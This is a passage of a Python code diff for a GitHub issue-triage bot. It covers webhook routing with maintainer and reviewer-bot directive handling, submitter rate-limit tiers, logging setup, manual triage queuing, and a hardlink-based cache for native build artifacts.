rb_login = _reviewer_bot_login(comment.get("user"))
|
||||
if rb_login is not None:
|
||||
# Reviewer bots like chatgpt-codex-connector speak authoritatively
|
||||
# already — no `@bot` mention required; pass the full body through.
|
||||
cleaned, pragmas = parse_pragmas(body)
|
||||
return {
|
||||
"directive": True,
|
||||
"directive_body": cleaned,
|
||||
"directive_author": rb_login,
|
||||
"directive_pragmas": pragmas,
|
||||
}
|
||||
if not is_maintainer(login, assoc, maintainers=maintainers):
|
||||
return {}
|
||||
stripped = extract_mention(body, bot_login)
|
||||
if stripped is None:
|
||||
return {}
|
||||
cleaned, pragmas = parse_pragmas(stripped)
|
||||
return {
|
||||
"directive": True,
|
||||
"directive_body": cleaned,
|
||||
"directive_author": login,
|
||||
"directive_pragmas": pragmas,
|
||||
}
|
||||
|
||||
if event_type == "issues":
|
||||
issue = payload.get("issue") or {}
|
||||
if "pull_request" in issue:
|
||||
return RouteDecision("skip", None, repo, None, "issue is a pull request")
|
||||
number = issue.get("number")
|
||||
if not isinstance(number, int):
|
||||
return RouteDecision("skip", None, repo, None, "issue missing number")
|
||||
key = issue_key(repo, number)
|
||||
if action == "opened":
|
||||
login, assoc = _submitter_info(issue)
|
||||
return RouteDecision(
|
||||
"queue", "triage_issue", repo, key, "issues.opened", submitter=login, association=assoc
|
||||
)
|
||||
if action == "closed":
|
||||
# Cleanup is a lifecycle event, not a user submission; no rate-limit subject.
|
||||
return RouteDecision("queue", "cleanup_workspace", repo, key, "issues.closed")
|
||||
return RouteDecision("skip", None, repo, key, f"issues.{action} ignored")
|
||||
|
||||
if event_type == "issue_comment" and action == "created":
|
||||
comment = payload.get("comment") or {}
|
||||
rb_login = _reviewer_bot_login(comment.get("user"))
|
||||
if rb_login is None and _is_bot_account(comment.get("user"), bot_login):
|
||||
return RouteDecision("skip", None, repo, None, "bot/self comment")
|
||||
issue = payload.get("issue") or {}
|
||||
number = issue.get("number")
|
||||
if not isinstance(number, int):
|
||||
return RouteDecision("skip", None, repo, None, "comment missing issue number")
|
||||
if "pull_request" in issue:
|
||||
# Conversation comment on a PR. The PR number lives at issue.number
|
||||
# on this payload type. Prefer the originating issue key when the
|
||||
# DB has it, but do not drop bot-authored follow-ups just because
|
||||
# the PR mapping was lost; the worker can recover from the PR
|
||||
# branch or handle the PR directly.
|
||||
key = _resolve_pr_key(number)
|
||||
login, assoc = _submitter_info(comment)
|
||||
return RouteDecision(
|
||||
"queue",
|
||||
"handle_pr_conversation",
|
||||
repo,
|
||||
key,
|
||||
f"issue_comment.created on PR #{number}",
|
||||
submitter=login,
|
||||
association=assoc,
|
||||
**_directive_kwargs(comment, login, assoc),
|
||||
)
|
||||
key = issue_key(repo, number)
|
||||
login, assoc = _submitter_info(comment)
|
||||
return RouteDecision(
|
||||
"queue",
|
||||
"handle_comment",
|
||||
repo,
|
||||
key,
|
||||
"issue_comment.created",
|
||||
submitter=login,
|
||||
association=assoc,
|
||||
**_directive_kwargs(comment, login, assoc),
|
||||
)
|
||||
|
||||
if event_type == "pull_request_review_comment" and action == "created":
|
||||
comment = payload.get("comment") or {}
|
||||
rb_login = _reviewer_bot_login(comment.get("user"))
|
||||
if rb_login is None and _is_bot_account(comment.get("user"), bot_login):
|
||||
return RouteDecision("skip", None, repo, None, "bot/self review comment")
|
||||
pr = payload.get("pull_request") or {}
|
||||
pr_user = pr.get("user") or {}
|
||||
if str(pr_user.get("login") or "") != bot_login:
|
||||
return RouteDecision("skip", None, repo, None, "PR not authored by bot")
|
||||
number = pr.get("number")
|
||||
if not isinstance(number, int):
|
||||
return RouteDecision("skip", None, repo, None, "PR missing number")
|
||||
key = _resolve_pr_key(number)
|
||||
login, assoc = _submitter_info(comment)
|
||||
return RouteDecision(
|
||||
"queue",
|
||||
"handle_review",
|
||||
repo,
|
||||
key,
|
||||
"pull_request_review_comment.created",
|
||||
submitter=login,
|
||||
association=assoc,
|
||||
**_directive_kwargs(comment, login, assoc),
|
||||
)
|
||||
|
||||
if event_type == "pull_request" and action == "closed":
|
||||
pr = payload.get("pull_request") or {}
|
||||
pr_user = pr.get("user") or {}
|
||||
if str(pr_user.get("login") or "") != bot_login:
|
||||
return RouteDecision("skip", None, repo, None, "PR not bot-authored")
|
||||
if not bool(pr.get("merged")):
|
||||
return RouteDecision("skip", None, repo, None, "PR closed without merge")
|
||||
number = pr.get("number")
|
||||
if not isinstance(number, int):
|
||||
return RouteDecision("skip", None, repo, None, "PR missing number")
|
||||
return RouteDecision("queue", "cleanup_workspace", repo, _resolve_pr_key(number), "pull_request.merged")
|
||||
|
||||
return RouteDecision("skip", None, repo, None, f"{event_type}.{action} not handled")
|
||||
|
||||
|
||||
TRUSTED_ASSOCIATIONS: frozenset[str] = frozenset({"OWNER", "MEMBER", "COLLABORATOR"})
|
||||
"""GitHub `author_association` values that bypass per-user rate limiting."""
|
||||
|
||||
|
||||
def rate_limit_cap(
|
||||
login: str,
|
||||
association: str | None,
|
||||
*,
|
||||
unlimited: frozenset[str],
|
||||
default: int,
|
||||
contributor: int,
|
||||
) -> int | None:
|
||||
"""Return the per-window submission cap for a submitter, or `None` for unlimited.
|
||||
|
||||
Precedence: explicit `unlimited` allowlist > trusted GitHub association
|
||||
(`OWNER`/`MEMBER`/`COLLABORATOR`) > `CONTRIBUTOR` tier > default tier.
|
||||
"""
|
||||
if login.lower() in unlimited:
|
||||
return None
|
||||
if association:
|
||||
upper = association.upper()
|
||||
if upper in TRUSTED_ASSOCIATIONS:
|
||||
return None
|
||||
if upper == "CONTRIBUTOR":
|
||||
return contributor
|
||||
return default
|
||||
|
||||
|
||||
__all__ = [
|
||||
"Decision",
|
||||
"RouteDecision",
|
||||
"TRUSTED_ASSOCIATIONS",
|
||||
"extract_mention",
|
||||
"is_maintainer",
|
||||
"rate_limit_cap",
|
||||
"route",
|
||||
"verify_signature",
|
||||
]
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,179 @@
|
||||
"""Logging configuration for roboomp — JSON to file, pretty ANSI to stdout."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
import logging.handlers
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
_RESERVED = frozenset(
|
||||
{
|
||||
"args",
|
||||
"asctime",
|
||||
"created",
|
||||
"exc_info",
|
||||
"exc_text",
|
||||
"filename",
|
||||
"funcName",
|
||||
"levelname",
|
||||
"levelno",
|
||||
"lineno",
|
||||
"message",
|
||||
"module",
|
||||
"msecs",
|
||||
"msg",
|
||||
"name",
|
||||
"pathname",
|
||||
"process",
|
||||
"processName",
|
||||
"relativeCreated",
|
||||
"stack_info",
|
||||
"thread",
|
||||
"threadName",
|
||||
"taskName",
|
||||
}
|
||||
)
|
||||
|
||||
# ── ANSI helpers ──────────────────────────────────────────────────────────────
|
||||
|
||||
_RST = "\033[0m"
|
||||
_DIM = "\033[2m"
|
||||
|
||||
_LEVEL_COLOR: dict[str, str] = {
|
||||
"DEBUG": "\033[34m", # blue
|
||||
"INFO": "\033[32m", # green
|
||||
"WARNING": "\033[33m", # yellow
|
||||
"ERROR": "\033[31m", # red
|
||||
"CRITICAL": "\033[1;31m", # bold red
|
||||
}
|
||||
|
||||
# Fields that uvicorn injects and that are not useful in pretty output.
|
||||
_PRETTY_SKIP = _RESERVED | {"color_message", "color_levelname"}
|
||||
|
||||
|
||||
class PrettyFormatter(logging.Formatter):
|
||||
"""Human-readable single-line formatter with ANSI colour.
|
||||
|
||||
Output shape:
|
||||
HH:MM:SS LEVEL logger.name message key=val key2=val2
|
||||
"""
|
||||
|
||||
def format(self, record: logging.LogRecord) -> str: # noqa: A003
|
||||
ts = time.strftime("%H:%M:%S", time.gmtime(record.created))
|
||||
color = _LEVEL_COLOR.get(record.levelname, "")
|
||||
level = f"{color}{record.levelname:<8}{_RST}"
|
||||
# Strip the package prefix to save width; keeps uvicorn.*, httpx, etc.
|
||||
name = record.name.removeprefix("robomp.")
|
||||
logger_col = f"{_DIM}{name:<22}{_RST}"
|
||||
msg = record.getMessage()
|
||||
|
||||
extras: list[str] = []
|
||||
for key, val in record.__dict__.items():
|
||||
if key in _PRETTY_SKIP or key.startswith("_"):
|
||||
continue
|
||||
extras.append(f"{key}={val}")
|
||||
|
||||
line = f"{_DIM}{ts}{_RST} {level} {logger_col} {msg}"
|
||||
if extras:
|
||||
line += f" {_DIM}{' '.join(extras)}{_RST}"
|
||||
if record.exc_info:
|
||||
line += "\n" + self.formatException(record.exc_info)
|
||||
if record.stack_info:
|
||||
line += "\n" + self.formatStack(record.stack_info)
|
||||
return line
|
||||
|
||||
|
||||
# ── JSON formatter (kept for file handler) ────────────────────────────────────
|
||||
|
||||
|
||||
class JsonFormatter(logging.Formatter):
|
||||
def format(self, record: logging.LogRecord) -> str: # noqa: A003
|
||||
payload: dict[str, Any] = {
|
||||
"ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(record.created)),
|
||||
"level": record.levelname,
|
||||
"logger": record.name,
|
||||
"msg": record.getMessage(),
|
||||
}
|
||||
if record.exc_info:
|
||||
payload["exc"] = self.formatException(record.exc_info)
|
||||
for key, value in record.__dict__.items():
|
||||
if key in _RESERVED or key.startswith("_"):
|
||||
continue
|
||||
try:
|
||||
json.dumps(value, default=str)
|
||||
payload[key] = value
|
||||
except (TypeError, ValueError):
|
||||
payload[key] = repr(value)
|
||||
return json.dumps(payload, default=str)
|
||||
|
||||
|
||||
# ── Setup ─────────────────────────────────────────────────────────────────────
|
||||
|
||||
# Dashboard polls these endpoints every couple seconds; mute them in access logs.
|
||||
_ACCESS_MUTE_PATHS = ("/api/status", "/api/logs", "/healthz", "/readyz")
|
||||
|
||||
|
||||
class _MuteDashboardPolling(logging.Filter):
|
||||
"""Drop uvicorn.access lines for high-frequency dashboard polling."""
|
||||
|
||||
def filter(self, record: logging.LogRecord) -> bool: # noqa: A003
|
||||
args = record.args
|
||||
# uvicorn.access format: '%s - "%s %s HTTP/%s" %d'
|
||||
# args = (client_addr, method, full_path, http_version, status_code)
|
||||
if isinstance(args, tuple) and len(args) >= 3:
|
||||
method, path = args[1], args[2]
|
||||
if method == "GET" and isinstance(path, str):
|
||||
base = path.split("?", 1)[0]
|
||||
if base in _ACCESS_MUTE_PATHS:
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
_INITIALIZED = False
|
||||
|
||||
|
||||
def configure_logging(log_dir: Path | None = None, level: int = logging.INFO) -> None:
|
||||
"""Idempotently configure logging: pretty ANSI to stdout, JSON to file."""
|
||||
global _INITIALIZED
|
||||
if _INITIALIZED:
|
||||
return
|
||||
root = logging.getLogger()
|
||||
root.setLevel(level)
|
||||
for handler in list(root.handlers):
|
||||
root.removeHandler(handler)
|
||||
|
||||
stream = logging.StreamHandler(sys.stdout)
|
||||
stream.setFormatter(PrettyFormatter())
|
||||
root.addHandler(stream)
|
||||
|
||||
if log_dir is not None:
|
||||
log_dir.mkdir(parents=True, exist_ok=True)
|
||||
file_handler = logging.handlers.RotatingFileHandler(
|
||||
log_dir / "robomp.log.jsonl",
|
||||
maxBytes=10 * 1024 * 1024,
|
||||
backupCount=5,
|
||||
encoding="utf-8",
|
||||
)
|
||||
file_handler.setFormatter(JsonFormatter())
|
||||
root.addHandler(file_handler)
|
||||
|
||||
logging.getLogger("httpx").setLevel(logging.WARNING)
|
||||
logging.getLogger("httpcore").setLevel(logging.WARNING)
|
||||
logging.getLogger("uvicorn.access").addFilter(_MuteDashboardPolling())
|
||||
_INITIALIZED = True
|
||||
|
||||
|
||||
def reset_logging_for_tests() -> None:
|
||||
global _INITIALIZED
|
||||
_INITIALIZED = False
|
||||
root = logging.getLogger()
|
||||
for handler in list(root.handlers):
|
||||
root.removeHandler(handler)
|
||||
|
||||
|
||||
def get_logger(name: str) -> logging.Logger:
|
||||
return logging.getLogger(name)
|
||||
@@ -0,0 +1,158 @@
|
||||
"""Manually enqueue an issue as if a webhook arrived.
|
||||
|
||||
Shared by the `robomp triage` CLI and the dashboard's POST /api/trigger.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import re
|
||||
import time
|
||||
from typing import Any
|
||||
|
||||
from robomp.db import INACTIVE_EVENT_STATES, Database, EventRow, issue_key
|
||||
from robomp.github_backend import GitHubBackend
|
||||
|
||||
_ISSUE_REF = re.compile(r"^(?P<owner>[^/\s]+)/(?P<repo>[^#\s]+)#(?P<number>\d+)$")
|
||||
|
||||
|
||||
class InvalidIssueRef(ValueError):
|
||||
"""Raised when the user-supplied issue reference can't be parsed."""
|
||||
|
||||
|
||||
class ManualTriageError(ValueError):
|
||||
"""Raised when a live GitHub issue cannot be manually triaged."""
|
||||
|
||||
|
||||
class ManualTriageConflict(RuntimeError):
|
||||
"""Raised when a stable manual delivery id is already active."""
|
||||
|
||||
def __init__(self, delivery_id: str, state: str) -> None:
|
||||
self.delivery_id = delivery_id
|
||||
self.state = state
|
||||
super().__init__(f"{delivery_id} is already {state}")
|
||||
|
||||
|
||||
class ManualTriageTimeout(TimeoutError):
|
||||
"""Raised when a manual CLI waiter stops before terminal state."""
|
||||
|
||||
def __init__(self, delivery_id: str, state: str, timeout_seconds: float) -> None:
|
||||
self.delivery_id = delivery_id
|
||||
self.state = state
|
||||
self.timeout_seconds = timeout_seconds
|
||||
super().__init__(f"{delivery_id} did not reach a terminal state within {timeout_seconds:g}s (state={state})")
|
||||
|
||||
|
||||
def parse_issue_ref(ref: str) -> tuple[str, int]:
|
||||
"""Parse `owner/repo#NN` into `("owner/repo", NN)`."""
|
||||
match = _ISSUE_REF.match(ref.strip())
|
||||
if match is None:
|
||||
raise InvalidIssueRef(f"expected owner/repo#NN, got {ref!r}")
|
||||
return f"{match.group('owner')}/{match.group('repo')}", int(match.group("number"))
|
||||
|
||||
|
||||
def manual_delivery_id(repo_full: str, number: int) -> str:
|
||||
"""Stable delivery id for manually-triggered triage. Re-runs reuse it."""
|
||||
return f"manual-{repo_full.replace('/', '__')}-{number}"
|
||||
|
||||
|
||||
async def build_issues_opened_payload(github: GitHubBackend, repo_full: str, number: int) -> dict[str, Any]:
|
||||
"""Fetch the issue + repo metadata and synthesize an `issues.opened` payload."""
|
||||
issue = await github.get_issue(repo_full, number)
|
||||
if issue.is_pull_request:
|
||||
raise ManualTriageError(f"{repo_full}#{number} is a pull request, not an issue")
|
||||
repo = await github.get_repo(repo_full)
|
||||
return {
|
||||
"action": "opened",
|
||||
"issue": {
|
||||
"number": issue.number,
|
||||
"title": issue.title,
|
||||
"body": issue.body,
|
||||
"state": issue.state,
|
||||
"user": {"login": issue.author},
|
||||
"labels": [{"name": lbl} for lbl in issue.labels],
|
||||
},
|
||||
"repository": {
|
||||
"full_name": repo.full_name,
|
||||
"default_branch": repo.default_branch,
|
||||
"clone_url": repo.clone_url,
|
||||
"private": repo.private,
|
||||
},
|
||||
}
|
||||
|
||||
|
||||
async def enqueue_manual_triage(*, db: Database, github: GitHubBackend, repo_full: str, number: int) -> str:
|
||||
"""Fetch the issue from GitHub and queue it for the worker pool.
|
||||
|
||||
Returns the delivery_id. A row may already exist from a previous manual
|
||||
triage; inactive rows are replaced so the fresh payload (and reset attempt
|
||||
counter) wins. Active rows are left intact.
|
||||
"""
|
||||
delivery = manual_delivery_id(repo_full, number)
|
||||
existing = db.get_event(delivery)
|
||||
if existing is not None and existing.state in ("queued", "running"):
|
||||
raise ManualTriageConflict(delivery, existing.state)
|
||||
|
||||
payload = await build_issues_opened_payload(github, repo_full, number)
|
||||
replaced = db.replace_event_if_state_in(
|
||||
delivery_id=delivery,
|
||||
event_type="issues",
|
||||
repo=repo_full,
|
||||
issue_key=issue_key(repo_full, number),
|
||||
payload=payload,
|
||||
state="queued",
|
||||
allowed_existing_states=INACTIVE_EVENT_STATES,
|
||||
)
|
||||
if not replaced:
|
||||
current = db.get_event(delivery)
|
||||
state = current.state if current is not None else "active"
|
||||
raise ManualTriageConflict(delivery, state)
|
||||
return delivery
|
||||
|
||||
|
||||
_TERMINAL_STATES: tuple[str, ...] = ("done", "failed", "skipped")
|
||||
|
||||
|
||||
async def await_terminal_state(
|
||||
db: Database,
|
||||
delivery_id: str,
|
||||
*,
|
||||
poll_interval: float = 2.0,
|
||||
timeout: float | None = None,
|
||||
) -> EventRow | None:
|
||||
"""Block until the event row reaches a terminal state, vanishes, or times out.
|
||||
|
||||
Pure DB polling — the caller MUST NOT spawn its own ``WorkerPool``; the
|
||||
long-lived ``serve`` process is the only owner of the dispatcher loop.
|
||||
Returns the final row, or ``None`` if the row was deleted while waiting.
|
||||
Raises ``ManualTriageTimeout`` if ``timeout`` elapses first.
|
||||
"""
|
||||
deadline = None if timeout is None else time.monotonic() + timeout
|
||||
while True:
|
||||
row = db.get_event(delivery_id)
|
||||
if row is None:
|
||||
return None
|
||||
if row.state in _TERMINAL_STATES:
|
||||
return row
|
||||
|
||||
sleep_for = poll_interval
|
||||
if deadline is not None:
|
||||
remaining = deadline - time.monotonic()
|
||||
if remaining <= 0:
|
||||
assert timeout is not None
|
||||
raise ManualTriageTimeout(delivery_id, row.state, timeout)
|
||||
sleep_for = min(poll_interval, remaining)
|
||||
await asyncio.sleep(sleep_for)
|
||||
|
||||
|
||||
__all__ = [
|
||||
"InvalidIssueRef",
|
||||
"ManualTriageError",
|
||||
"ManualTriageConflict",
|
||||
"ManualTriageTimeout",
|
||||
"await_terminal_state",
|
||||
"build_issues_opened_payload",
|
||||
"enqueue_manual_triage",
|
||||
"manual_delivery_id",
|
||||
"parse_issue_ref",
|
||||
]
|
||||
@@ -0,0 +1,485 @@
|
||||
"""Content-addressed cache of pre-built ``packages/natives/native/`` artifacts.
|
||||
|
||||
The napi-rs build of ``pi_natives.<platform>-<arch>[-variant].node`` takes
|
||||
minutes. Most issues never touch ``crates/``, so the same artifact is
|
||||
buildable in every workspace whose source state matches one we've already
|
||||
built. This module:
|
||||
|
||||
1. Computes a deterministic key from the git tree-hashes of the inputs that
|
||||
determine the build output, plus the target triple.
|
||||
2. On workspace populate: hardlinks cached files into the worktree's
|
||||
``packages/natives/native/`` (a noop on cache miss).
|
||||
3. On successful task exit: captures the workspace's freshly-built artifacts
|
||||
into the cache under its (possibly new) key.
|
||||
|
||||
Hardlink semantics give COW for free: every tool in the napi build path
|
||||
replaces files via write-temp + rename, so a workspace rebuilding the addon
|
||||
allocates a new inode and leaves the cached file untouched. Cache GC is by
|
||||
LRU on ``manifest.json.captured_at``; hardlinked workspaces keep the inode
|
||||
alive after the cache directory is rmtree'd.
|
||||
|
||||
Ownership: cache root is provisioned ``root:omp 02770`` by ``entrypoint.sh``
|
||||
so slot subprocesses (group ``omp``) can capture under setgid inheritance.
|
||||
Same shape as ``/data/cache/cargo``.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import errno
|
||||
import fcntl
|
||||
import hashlib
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import platform
|
||||
import shutil
|
||||
import subprocess
|
||||
import sys
|
||||
import time
|
||||
from collections.abc import Generator
|
||||
from contextlib import contextmanager
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
from typing import IO
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
|
||||
# Paths whose git tree-hash feeds the cache key. Order is significant — the
|
||||
# hash incorporates the (path, tree_hash) pairs in this exact order so a
|
||||
# different ordering would produce a different key. Cover every input the
|
||||
# napi build reads: all workspace crates (pi-natives transitively depends on
|
||||
# pi-ast/pi-iso/pi-shell), the workspace Cargo manifest + lock, the rust
|
||||
# toolchain pin, and the natives package itself (build script + scripts/* +
|
||||
# package.json with napi config).
|
||||
CACHE_KEY_PATHS: tuple[str, ...] = (
|
||||
"crates",
|
||||
"Cargo.lock",
|
||||
"Cargo.toml",
|
||||
"rust-toolchain.toml",
|
||||
"packages/natives",
|
||||
)
|
||||
|
||||
# Files in ``packages/natives/native/`` that ARE pure functions of the
|
||||
# cache-key inputs and travel as a unit. ``.node`` is matched by glob since
|
||||
# the basename embeds the target triple + variant.
|
||||
_CACHED_NODE_GLOB = "pi_natives.*.node"
|
||||
_CACHED_COMPANION_FILES: tuple[str, ...] = (
|
||||
"index.d.ts",
|
||||
"index.js",
|
||||
"embedded-addon.js",
|
||||
)
|
||||
_MANIFEST_FILENAME = "manifest.json"
|
||||
_LOCKFILE_NAME = ".lock"
|
||||
|
||||
_NULL_TREE_HASH = "0" * 40 # placeholder for paths missing from HEAD
|
||||
|
||||
|
||||
def _normalize_platform() -> str:
|
||||
"""Mirror node's ``process.platform`` so the cache key matches
|
||||
``build-native.ts``'s filename convention."""
|
||||
s = sys.platform
|
||||
if s.startswith("linux"):
|
||||
return "linux"
|
||||
if s == "darwin":
|
||||
return "darwin"
|
||||
if s in ("win32", "cygwin"):
|
||||
return "win32"
|
||||
return s
|
||||
|
||||
|
||||
def _normalize_arch() -> str:
|
||||
"""Mirror node's ``process.arch``."""
|
||||
m = platform.machine().lower()
|
||||
if m in ("x86_64", "amd64"):
|
||||
return "x64"
|
||||
if m in ("aarch64", "arm64"):
|
||||
return "arm64"
|
||||
return m
|
||||
|
||||
|
||||
def target_triple() -> str:
|
||||
"""``<platform>-<arch>[-<variant>]`` matching the napi addon basename.
|
||||
|
||||
``TARGET_VARIANT`` is honored only on x64 (the build script enforces the
|
||||
same restriction). On x64 hosts that leave the variant unset we encode
|
||||
``host`` to keep the key stable across workspaces on the same machine
|
||||
without trying to autodetect AVX2 from Python.
|
||||
"""
|
||||
plat = _normalize_platform()
|
||||
arch = _normalize_arch()
|
||||
if arch != "x64":
|
||||
return f"{plat}-{arch}"
|
||||
variant = os.environ.get("TARGET_VARIANT", "").strip() or "host"
|
||||
return f"{plat}-{arch}-{variant}"
|
||||
|
||||
|
||||
def _git_safe_directory_env(repo_dir: Path) -> dict[str, str]:
|
||||
"""Env overlay that whitelists ``repo_dir`` for git's safe.directory check.
|
||||
|
||||
The orchestrator runs as root but workspaces are owned by the slot UID
|
||||
(see ``SandboxManager._chown_workspace``). Without this whitelist, every
|
||||
git invocation from the orchestrator on a slot-owned repo aborts with
|
||||
"fatal: detected dubious ownership". Mirrors
|
||||
``robomp.sandbox._safe_directory_env`` but kept local to avoid a circular
|
||||
import (sandbox imports this module).
|
||||
"""
|
||||
env = os.environ.copy()
|
||||
count = int(env.get("GIT_CONFIG_COUNT", "0"))
|
||||
env[f"GIT_CONFIG_KEY_{count}"] = "safe.directory"
|
||||
env[f"GIT_CONFIG_VALUE_{count}"] = str(repo_dir)
|
||||
env["GIT_CONFIG_COUNT"] = str(count + 1)
|
||||
return env
|
||||
|
||||
|
||||
def compute_key(repo_dir: Path, *, target: str | None = None) -> str:
|
||||
"""Deterministic sha256 over the git tree-hashes of cache-key paths.
|
||||
|
||||
Uses ``git cat-file --batch-check`` for one subprocess invocation. Missing
|
||||
paths fold in as a fixed null hash so the key remains deterministic
|
||||
across repos that don't ship every input file.
|
||||
|
||||
Raises ``subprocess.CalledProcessError`` if ``git`` itself fails (e.g.
|
||||
not a repo) — callers SHOULD treat that as "no cache" and proceed.
|
||||
"""
|
||||
tgt = target if target is not None else target_triple()
|
||||
stdin = "".join(f"HEAD:{p}\n" for p in CACHE_KEY_PATHS)
|
||||
proc = subprocess.run(
|
||||
["git", "cat-file", "--batch-check"],
|
||||
input=stdin,
|
||||
cwd=str(repo_dir),
|
||||
text=True,
|
||||
capture_output=True,
|
||||
check=True,
|
||||
env=_git_safe_directory_env(repo_dir),
|
||||
)
|
||||
lines = proc.stdout.splitlines()
|
||||
if len(lines) != len(CACHE_KEY_PATHS):
|
||||
raise RuntimeError(
|
||||
f"git cat-file returned {len(lines)} lines, expected {len(CACHE_KEY_PATHS)}: {proc.stdout!r}"
|
||||
)
|
||||
h = hashlib.sha256()
|
||||
for path, line in zip(CACHE_KEY_PATHS, lines, strict=True):
|
||||
stripped = line.strip()
|
||||
if stripped.endswith("missing"):
|
||||
tree_hash = _NULL_TREE_HASH
|
||||
else:
|
||||
# "<hash> <type> <size>" — take the first token as the tree/blob hash.
|
||||
tree_hash = stripped.split(None, 1)[0]
|
||||
h.update(f"{path}\t{tree_hash}\n".encode())
|
||||
h.update(f"TARGET\t{tgt}\n".encode())
|
||||
return h.hexdigest()
|
||||
|
||||
|
||||
def _repo_slug(repo: str) -> str:
|
||||
"""Same convention as ``SandboxManager.pool_path``."""
|
||||
return repo.replace("/", "__")
|
||||
|
||||
|
||||
def _atomic_link(src: Path, dst: Path) -> None:
|
||||
"""Hardlink ``src`` → ``dst``, replacing any existing ``dst`` atomically.
|
||||
|
||||
Falls back to ``shutil.copy2`` on ``EXDEV`` (cross-filesystem). The
|
||||
replace semantics use a sibling temp file + ``os.replace`` so a crash
|
||||
mid-link doesn't leave ``dst`` half-overwritten.
|
||||
"""
|
||||
dst.parent.mkdir(parents=True, exist_ok=True)
|
||||
tmp = dst.with_suffix(dst.suffix + f".tmp.{os.getpid()}")
|
||||
try:
|
||||
try:
|
||||
os.link(src, tmp)
|
||||
except OSError as exc:
|
||||
if exc.errno != errno.EXDEV:
|
||||
raise
|
||||
shutil.copy2(src, tmp)
|
||||
os.replace(tmp, dst)
|
||||
finally:
|
||||
# Best-effort cleanup if os.link succeeded but os.replace blew up.
|
||||
try:
|
||||
tmp.unlink()
|
||||
except FileNotFoundError:
|
||||
pass
|
||||
|
||||
|
||||
def _atomic_copy(src: Path, dst: Path) -> None:
|
||||
"""Copy ``src`` → ``dst`` via a sibling temp file + ``os.replace``.
|
||||
|
||||
Used for cached files that downstream tools rewrite via
|
||||
``open(..., 'w')`` (in-place truncate). Replacing the workspace dst
|
||||
atomically means a fresh inode every populate — the cache file is
|
||||
never mutated through a hardlink.
|
||||
"""
|
||||
dst.parent.mkdir(parents=True, exist_ok=True)
|
||||
tmp = dst.with_suffix(dst.suffix + f".tmp.{os.getpid()}")
|
||||
try:
|
||||
shutil.copy2(src, tmp)
|
||||
os.replace(tmp, dst)
|
||||
finally:
|
||||
try:
|
||||
tmp.unlink()
|
||||
except FileNotFoundError:
|
||||
pass
|
||||
|
||||
|
||||
@contextmanager
|
||||
def _flock(path: Path) -> Generator[IO[bytes]]:
|
||||
"""Exclusive ``fcntl.flock`` on ``path`` (created if missing).
|
||||
|
||||
``flock`` is advisory but every caller goes through ``NativesCache``, so
|
||||
cooperative locking is sufficient. POSIX-only — Windows is not a target.
|
||||
"""
|
||||
path.parent.mkdir(parents=True, exist_ok=True)
|
||||
fh = open(path, "ab+") # noqa: SIM115 — managed by the context manager
|
||||
try:
|
||||
fcntl.flock(fh.fileno(), fcntl.LOCK_EX)
|
||||
yield fh
|
||||
finally:
|
||||
try:
|
||||
fcntl.flock(fh.fileno(), fcntl.LOCK_UN)
|
||||
finally:
|
||||
fh.close()
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class CacheHit:
|
||||
"""Files copied/linked into the workspace by ``populate_workspace``."""
|
||||
|
||||
cache_dir: Path
|
||||
files: tuple[Path, ...]
|
||||
|
||||
|
||||
class NativesCache:
|
||||
"""Per-repo content-addressed cache of pi-natives build outputs."""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
root: Path,
|
||||
*,
|
||||
max_entries_per_repo: int = 8,
|
||||
max_bytes: int = 4 * 1024**3,
|
||||
) -> None:
|
||||
self.root = root
|
||||
self.max_entries_per_repo = max(1, max_entries_per_repo)
|
||||
self.max_bytes = max(0, max_bytes)
|
||||
root.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
# ---- layout helpers ----
|
||||
def repo_root(self, repo: str) -> Path:
|
||||
return self.root / _repo_slug(repo)
|
||||
|
||||
def entry_dir(self, repo: str, key: str) -> Path:
|
||||
return self.repo_root(repo) / key
|
||||
|
||||
def lockfile(self, repo: str) -> Path:
|
||||
return self.repo_root(repo) / _LOCKFILE_NAME
|
||||
|
||||
# ---- query ----
|
||||
def lookup(self, repo: str, key: str) -> Path | None:
|
||||
"""Return the cache directory if ``key`` is present and complete."""
|
||||
entry = self.entry_dir(repo, key)
|
||||
if not (entry / _MANIFEST_FILENAME).exists():
|
||||
return None
|
||||
# A complete entry has a node file plus all companions.
|
||||
if not list(entry.glob(_CACHED_NODE_GLOB)):
|
||||
return None
|
||||
for name in _CACHED_COMPANION_FILES:
|
||||
if not (entry / name).exists():
|
||||
return None
|
||||
return entry
|
||||
|
||||
# ---- populate (workspace ← cache) ----
|
||||
def populate_workspace(
|
||||
self,
|
||||
repo: str,
|
||||
key: str,
|
||||
native_dir: Path,
|
||||
) -> CacheHit | None:
|
||||
"""Hardlink the `.node`, copy companions, into ``native_dir``.
|
||||
|
||||
Returns the ``CacheHit`` on a hit; ``None`` on miss. Caller has
|
||||
already computed ``key`` and verified ``native_dir`` exists.
|
||||
|
||||
Why hardlink the .node but COPY the companions: the napi build's
|
||||
``installBinary`` replaces the .node via temp + rename (new inode,
|
||||
cache safe), but ``installGeneratedBindings`` and ``gen-enums.ts``
|
||||
rewrite ``index.d.ts`` / ``index.js`` / ``embedded-addon.js`` with
|
||||
plain ``open(..., 'w')`` — that's open-truncate-write IN PLACE on
|
||||
Linux. A hardlinked companion would propagate the truncate into the
|
||||
cache. Copies are independent inodes and absorb the rewrite safely.
|
||||
"""
|
||||
entry = self.lookup(repo, key)
|
||||
if entry is None:
|
||||
return None
|
||||
native_dir.mkdir(parents=True, exist_ok=True)
|
||||
copied: list[Path] = []
|
||||
for src in entry.glob(_CACHED_NODE_GLOB):
|
||||
dst = native_dir / src.name
|
||||
_atomic_link(src, dst)
|
||||
copied.append(dst)
|
||||
for name in _CACHED_COMPANION_FILES:
|
||||
src = entry / name
|
||||
dst = native_dir / name
|
||||
